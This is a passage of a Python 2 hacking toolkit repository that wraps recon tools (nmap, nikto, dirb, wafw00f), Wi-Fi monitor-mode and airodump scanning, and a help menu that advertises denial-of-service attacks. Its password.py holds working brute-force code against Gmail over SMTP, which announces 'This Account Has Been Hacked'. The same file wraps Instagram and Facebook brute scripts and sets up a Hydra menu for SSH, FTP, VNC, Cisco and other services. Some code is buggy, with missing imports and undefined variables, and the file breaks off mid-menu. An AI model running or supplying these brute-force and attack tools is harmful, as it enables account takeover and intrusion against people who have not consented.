░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | def helpbanner(): 40 | a = os.popen("ls commandlist -1 | wc -l").read() 41 | b = a.replace('\n', '') 42 | print """ 43 | ╔══════════════════════════════════════════════════════════╗ 44 | ║ ║ 45 | ║ \033[92m ██░ ██ ▓█████ ██▓ ██▓███ \033[0m ║ 46 | ║ \033[90m ▓██░ ██▒▓█ ▀ ▓██▒ ▓██░ ██▒ \033[0m ║ 47 | ║ \033[92m ▒██▀▀██░▒███ ▒██░ ▓██░ ██▓▒ \033[0m ║ 48 | ║ \033[90m ░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██▄█▓▒ ▒ \033[0m ║ 49 | ║ \033[92m ░▓█▒░██▓░▒████▒░██████▒▒██▒ ░ ░ \033[0m ║ 50 | ║ \033[94m ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░▒▓▒░ ░ ░ \033[0m ║ 51 | ║ \033[90m ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░▒ ░ \033[0m ║ 52 | ║ \033[94m ░ ░░ ░ ░ ░ ░ ░░ \033[0m ║ 53 | ║ \033[90m ░ ░ ░ ░ ░ ░ ░ \033[0m ║ 54 | ║ ║ 55 | ║══════════════════════════════════════════════════════════║ 56 | ║ Commands: [\033[32m{0}\033[0m] Banners: [\033[31m6\033[0m] ║ 57 | ║══════════════════════════════════════════════════════════════════════════════════════╗ 58 | ║ ? | this menu ║ 59 | ║ exit | exit htkl ║ 60 | ║ clear | clears screen ║ 61 | ║ banner | shows a banner ║ 62 | ║ infoscan | gather information on a host [for a more specific scan type infoscan -o] ║ 63 | ║ dos | run Denial-Of-Service attacks ║ 64 | ║ ║ 65 | ║ ║ 66 | ║ \033[5m@tuf_unkn0wn\033[0m ║ 67 | ╚══════════════════════════════════════════════════════════════════════════════════════╝ 68 | \033[0m\n""".format(b) 69 | helpbanner() 70 | -------------------------------------------------------------------------------- /commandlist/infoscan-o.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | def specscan(): 40 | print """\033[1m 41 | Scans Available:\033[0m 42 | 43 | 1: simple nmap portscan 44 | 45 | 2: show document info of target with curl 46 | 47 | 3: nmap OS detection, version detection, script scanning, and traceroute scan 48 | 49 | 4: nmap dns bruteforce 50 | 51 | 5: get a hosts ip address 52 | 53 | 6: check if a host is online 54 | 55 | 7: who-is lookup 56 | 57 | 8: dns-lookup 58 | 59 | 9: get a hosts source code 60 | 61 | 10: web application firewall scanner 62 | 63 | 11: run a ssl scan 64 | 65 | 12: find the location of a ip address 66 | 67 | 13: reverse ip lookup 68 | 69 | 14: host search 70 | 71 | 15: reverse dns 72 | 73 | 16: find shared dns 74 | 75 | 17: cloudflare bypass 76 | 77 | 18: sslscan 78 | 79 | 19: directory scan / bruteforce 80 | 81 | 20: nikto scan [this might take awhile to finish] 82 | 83 | go back: go back to main menu 84 | 85 | """ 86 | print "Type a number then your target Ex: 5 www.pornhub.com\n" 87 | j = False 88 | while not j: 89 | try: 90 | option, target = raw_input("\033[1mScan:\033[0m ").split() 91 | if option == "1": 92 | os.system("nmap {0}".format(target)) 93 | if option == "2": 94 | os.system("curl -I {0}".format(target)) 95 | if option == "3": 96 | os.system("nmap -A {0}".format(target)) 97 | if option == "4": 98 | os.system("nmap --script dns-brute {0}".format(target)) 99 | if option == "5": 100 | ip = socket.gethostbyname(target) 101 | print """ 102 | Host: {0} 103 | IP: {1} 104 | """.format(target, ip) 105 | if option == "6": 106 | ht = raw_input("\033[1mHTTP or HTTPS:\033[0m ") 107 | if ht == "https": 108 | targetht = "https://" 109 | if ht == "http": 110 | targetht = "http://" 111 | request = requests.get(targetht + target) 112 | http = request.status_code 113 | if http == 200: 114 | print("\nServer: [\033[32monline\033[0m]") 115 | else: 116 | print("\nServer: [\033[31moffline\033[0m]") 117 | if option == "7": 118 | whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") 119 | print(whois) 120 | if option == "8": 121 | os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) 122 | if option == "9": 123 | os.system("curl {0}".format(target)) 124 | if option == "10": 125 | os.system("wafw00f {0}".format(target)) 126 | if option == "11": 127 | os.system("sslscan {0}".format(target)) 128 | if option == "12": 129 | os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) 130 | if option == "13": 131 | os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) 132 | if option == "14": 133 | os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) 134 | if option == "15": 135 | os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) 136 | if option == "16": 137 | os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) 138 | if option == "17": 139 | def daf(): 140 | subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", 141 | "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", 142 | "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", 143 | "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", 144 | "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", 145 | "web", "dev"] 146 | 147 | for sublist in subdomainlist: 148 | try: 149 | hosts = str(sublist) + "." + str(target) 150 | showip = socket.gethostbyname(str(hosts)) 151 | print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) 152 | except: 153 | print "\033[0mBypassing..." 154 | 155 | daf() 156 | if option == "18": 157 | a = 'sslscan {0}'.format(target) 158 | os.system(a) 159 | if option == "19": 160 | ht = raw_input("HTTP or HTTPS: ") 161 | if ht == "https": 162 | targetht = "https://" 163 | if ht == "http": 164 | targetht = "http://" 165 | a = 'dirb {0}{1}/'.format(targetht,target) 166 | os.system(a) 167 | if option == "20": 168 | port = raw_input("\033[1mPort:\033[0m ") 169 | os.system("nikto -h {0} -p {1}".format(target,port)) 170 | if target == "back": 171 | break 172 | except: 173 | print "\n" 174 | break 175 | j = True 176 | specscan() 177 | -------------------------------------------------------------------------------- /commandlist/infoscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def infoscan(): 41 | try: 42 | target = raw_input("\033[1mTarget:\033[0m ") 43 | port = raw_input("\033[1mPort:\033[0m ") 44 | print "\033[93m! HTTP OR HTTPS !\033[0m\n" 45 | ht = raw_input("[https/http]: ") 46 | if ht == "http": 47 | targetht = 'http://' 48 | if ht == "https": 49 | targetht = 'https://' 50 | print "\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m\n" 51 | os.system("curl {0}".format(target)) 52 | print "\n" 53 | ip = socket.gethostbyname(target) 54 | print G+"------------------------\033[0m" 55 | print N+"\033[1mHost:\033[32m ", target 56 | print N+"\033[1mIP:\033[32m ", ip 57 | print G+"------------------------\033[0m" 58 | os.system("curl -I {0}".format(target)) 59 | print "\n" 60 | request = requests.get(targetht + target) 61 | http = request.status_code 62 | if http == 200: 63 | print("\nServer: [\033[32monline\033[0m]") 64 | else: 65 | print("\nServer: [\033[31moffline\033[0m]") 66 | exit() 67 | print "\n" 68 | whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") 69 | print(whois) 70 | print "\n" 71 | os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) 72 | print "\n" 73 | os.system("wafw00f {0}".format(target)) 74 | print "\n" 75 | os.system("sslscan {0}".format(target)) 76 | print "\n" 77 | os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) 78 | print "\n" 79 | os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) 80 | print "\n" 81 | os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) 82 | print "\n" 83 | os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) 84 | print "\n" 85 | os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) 86 | print "\n" 87 | def daf(): 88 | subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", 89 | "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", 90 | "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", 91 | "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", 92 | "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", 93 | "web", "dev"] 94 | 95 | for sublist in subdomainlist: 96 | try: 97 | hosts = str(sublist) + "." + str(target) 98 | showip = socket.gethostbyname(str(hosts)) 99 | print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) 100 | except: 101 | print "\033[0mBypassing..." 102 | 103 | daf() 104 | print "\033[0m" 105 | print "\n" 106 | os.system("nmap -A {0}".format(target)) 107 | print "\n" 108 | os.system("nmap --script dns-brute {0}".format(target)) 109 | print "\n" 110 | a = 'dirb {0}{1}/'.format(targetht,target) 111 | os.system(a) 112 | print "\n" 113 | os.system("nikto -h {0} -p {1}".format(target,port)) 114 | print "\n\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m" 115 | except: 116 | print "\033[91mError Something Went Wrong Maybe The Specified Target Is Not Available\033[0m" 117 | infoscan() 118 | -------------------------------------------------------------------------------- /commandlist/monitor-off.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def monitoroff(): 41 | os.system("iwconfig") 42 | i = raw_input("Select Interface: ") 43 | os.system("airmon-ng stop " + i) 44 | monitoroff() 45 | -------------------------------------------------------------------------------- /commandlist/monitor-on.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def monitoron(): 41 | os.system("iwconfig") 42 | i = raw_input("Select Interface: ") 43 | os.system("airmon-ng start " + i) 44 | monitoron() 45 | -------------------------------------------------------------------------------- /commandlist/netscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | import socket 26 | import socks 27 | import requests 28 | lred = '\033[91m' 29 | lblue = '\033[94m' 30 | lgreen = '\033[92m' 31 | yellow = '\033[93m' 32 | cyan = '\033[1;36m' 33 | purple = '\033[95m' 34 | red = '\033[31m' 35 | green = '\033[32m' 36 | blue = '\033[34m' 37 | orange = '\033[33m' 38 | 39 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 40 | randomcolor = random.choice(colorlist) 41 | banner3list = [red, blue, green, purple] 42 | 43 | def netscan(): 44 | print """ 45 | {0}1: scan for devices in your network 46 | 47 | {1}2: scan for networks around you 48 | \033[0m 49 | go back: go back to main menu 50 | """.format(random.choice(colorlist), random.choice(colorlist)) 51 | try: 52 | choice = raw_input("\033[1mScan:\033[0m ") 53 | 54 | if choice == "1": 55 | os.system("netdiscover") 56 | if choice == "2": 57 | os.system("iwconfig") 58 | m = raw_input("\033[1mSelect Interface:\033[0m ") 59 | os.system("airmon-ng start " + m) 60 | print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" 61 | j = raw_input("\033[1m[y/n]>\033[0m ") 62 | if j == "y": 63 | os.system("airodump-ng -w /root/SCAN " + m) 64 | print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" 65 | if j == "n": 66 | os.system("airodump-ng " + m) 67 | os.system("airmon-ng stop " + i) 68 | if choice == "go back": 69 | os.system("") 70 | except: 71 | print "\n" 72 | netscan() 73 | -------------------------------------------------------------------------------- /commandlist/password.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | import socket 26 | import socks 27 | import requests 28 | lred = '\033[91m' 29 | lblue = '\033[94m' 30 | lgreen = '\033[92m' 31 | yellow = '\033[93m' 32 | cyan = '\033[1;36m' 33 | purple = '\033[95m' 34 | red = '\033[31m' 35 | green = '\033[32m' 36 | blue = '\033[34m' 37 | orange = '\033[33m' 38 | 39 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 40 | randomcolor = random.choice(colorlist) 41 | banner3list = [red, blue, green, purple] 42 | def gmail(): 43 | 44 | def main(): 45 | print '\033[93m=================================================' 46 | print '\033[91m create by Ha3MrX ' 47 | print '\033[93m=================================================' 48 | print '\033[95m ++++++++++++++++++++ ' 49 | print '\n ' 50 | print '\033[92m _,. ' 51 | print ' ' 52 | print ' ' 53 | print ' HA3MrX ' 54 | print ' _,. ' 55 | print ' ,` -.) ' 56 | print ' ( _/-\\-._ ' 57 | print ' /,|`--._,-^| , ' 58 | print ' \_| |`-._/|| , | ' 59 | print ' | `-, / | / / ' 60 | print ' | || | / / ' 61 | print ' `r-._||/ __ / / ' 62 | print ' __,-<_ )`-/ `./ / ' 63 | print ' \ `--- \ / / / ' 64 | print ' | |./ / ' 65 | print ' / // / ' 66 | print ' \_/ \ |/ / ' 67 | print ' | | _,^- / / ' 68 | print ' | , `` (\/ /_ ' 69 | print ' \,.->._ \X-=/^ ' 70 | print ' ( / `-._//^` ' 71 | print ' `Y-.____(__} ' 72 | print ' | {__) ' 73 | print ' () \033[91m V.1.0 ' 74 | 75 | main() 76 | print '\033[0m[1] start the attack' 77 | print '[2] exit' 78 | option = input('==>') 79 | if option == 1: 80 | file_path = raw_input('path of passwords file :') 81 | else: 82 | system('clear') 83 | exit() 84 | pass_file = open(file_path,'r') 85 | pass_list = pass_file.readlines() 86 | def login(): 87 | i = 0 88 | user_name = raw_input('target email :') 89 | server = smtplib.SMTP_SSL('smtp.gmail.com', 465) 90 | server.ehlo() 91 | for password in pass_list: 92 | i = i + 1 93 | print str(i) + '/' + str(len(pass_list)) 94 | try: 95 | server.login(user_name, password) 96 | system('clear') 97 | main() 98 | print '\n' 99 | print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' 100 | break 101 | except smtplib.SMTPAuthenticationError as e: 102 | error = str(e) 103 | if error[14] == '<': 104 | system('clear') 105 | main() 106 | print '[+] this account has been hacked, password :' + password + ' ^_^' 107 | 108 | break 109 | else: 110 | print '[!] password not found => ' + password 111 | login() 112 | 113 | def insta(): 114 | insta = raw_input("\033[1mUsername:\033[0m ") 115 | jl = raw_input("\033[1mWordlist:\033[0m ") 116 | print "\033[1m\033[94m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" 117 | k = raw_input("\033[1mMode:\033[0m ") 118 | ma = 'python3 files/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) 119 | os.system(ma) 120 | 121 | def fb(): 122 | facebook = raw_input("\033[1m[EMAIL/ID->]:\033[0m ") 123 | word = raw_input("\033[1m[WORDLIST->]:\033[0m ") 124 | ks = 'cd files && perl fb-brute.pl {0} {1}'.format(facebook,word) 125 | os.system(ks) 126 | def blackhydra(): 127 | def restart_program(): 128 | python = sys.executable 129 | os.execl(python, python, * sys.argv) 130 | curdir = os.getcwd() 131 | ############################## 132 | 133 | os.system("clear") 134 | print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" 135 | print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" 136 | print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" 137 | print G+"-----------------------------------------------------" 138 | print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" 139 | print R+" [*] Author: DedSecTL --- [*] Version 1.0" 140 | print N+"c=={:::::::::::::::> Black Hydra Console" 141 | print R+" [*] My FB : https://m.facebook.com/100004136748473" 142 | print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" 143 | print 144 | print " ===|[ Brute Force ]|===" 145 | print 146 | print " [01] Cisco Brute Force " 147 | print " [02] VNC Brute Force " 148 | print " [03] FTP Brute Force " 149 | print " [04] Gmail Brute Force " 150 | print " [05] SSH Brute Force " 151 | print " [06] TeamSpeak Brute Force " 152 | print " [07] Telnet Brute Force " 153 | print " [08] Yahoo Mail Brute Force " 154 | print " [09] Hotmail Brute Force " 155 | print " [10] Router Speedy Brute Force " 156 | print " [11] RDP Brute Force " 157 | print " [12] MySQL Brute Force " 158 | print 159 | print " [00] Exit" 160 | print 161 | bhydra = raw_input("[*] B-Hydra > ") 162 | 163 | if bhydra == '01' or bhydra == '1': 164 | print 165 | print " +---------------------------+" 166 | print " | Cisco Brute Force |" 167 | print " +---------------------------+" 168 | print 169 | print 170 | iphost = raw_input("[*] IP/Hostname : ") 171 | word = raw_input("[*] Wordlist : ") 172 | os.system("hydra -P %s %s cisco" % (word, iphost)) 173 | sys.exit() 174 | 175 | elif bhydra == '02' or bhydra == '2': 176 | print 177 | print " +---------------------------+" 178 | print " | VNC Brute Force |" 179 | print " +---------------------------+" 180 | print 181 | print 182 | word = raw_input("[*] Wordlist : ") 183 | iphost = raw_input("[*] IP/Hostname : ") 184 | os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) 185 | iphost = raw_input("[*] IP/Hostname : ") 186 | 187 | elif bhydra == '03' or bhydra == '3': 188 | print 189 | print " +------------------------------+" 190 | print " | FTP Brute Force |" 191 | print " +------------------------------+" 192 | print 193 | print 194 | user = raw_input("[*] User : ") 195 | iphost = raw_input("[*] IP/Hostname : ") 196 | word = raw_input("[*] Wordlist : ") 197 | os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) 198 | sys.exit() 199 | 200 | elif bhydra == '04' or bhydra == '4': 201 | print 202 | print " +------------------------------+" 203 | print " | Gmail Brute Force |" 204 | print " +------------------------------+" 205 | print 206 | print 207 | email = raw_input("[*] Email : ") 208 | word = raw_input("[*] Wordlist : ") 209 | os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) 210 | sys.exit() 211 | 212 | elif bhydra == '05' or bhydra == '5': 213 | print 214 | print " +--------------------------------+" 215 | print " | SSH Brute Force |" 216 | print " +--------------------------------+" 217 | print 218 | print 219 | user = raw_input("[*] User : ") 220 | word = raw_input("[*] Wordlist : ") 221 | iphost = raw_input("[*] IP/Hostname : ") 222 | os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) 223 | sys.exit() 224 | 225 | elif bhydra == '06' or bhydra == '6': 226 | print 227 | print " +-------------------------+" 228 | print " | TeamSpeak Brute Force |" 229 | print " +-------------------------+" 230 | print 231 | print 232 | user = raw_input("[*] User : ") 233 | word = raw_input("[*] Wordlist : ") 234 | iphost = raw_input("[*] IP/Hostname : ") 235 | os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) 236 | sys.exit() 237 | 238 | elif bhydra == '07' or bhydra == '7': 239 | print 240 | print " +-------------------------+" 241 | 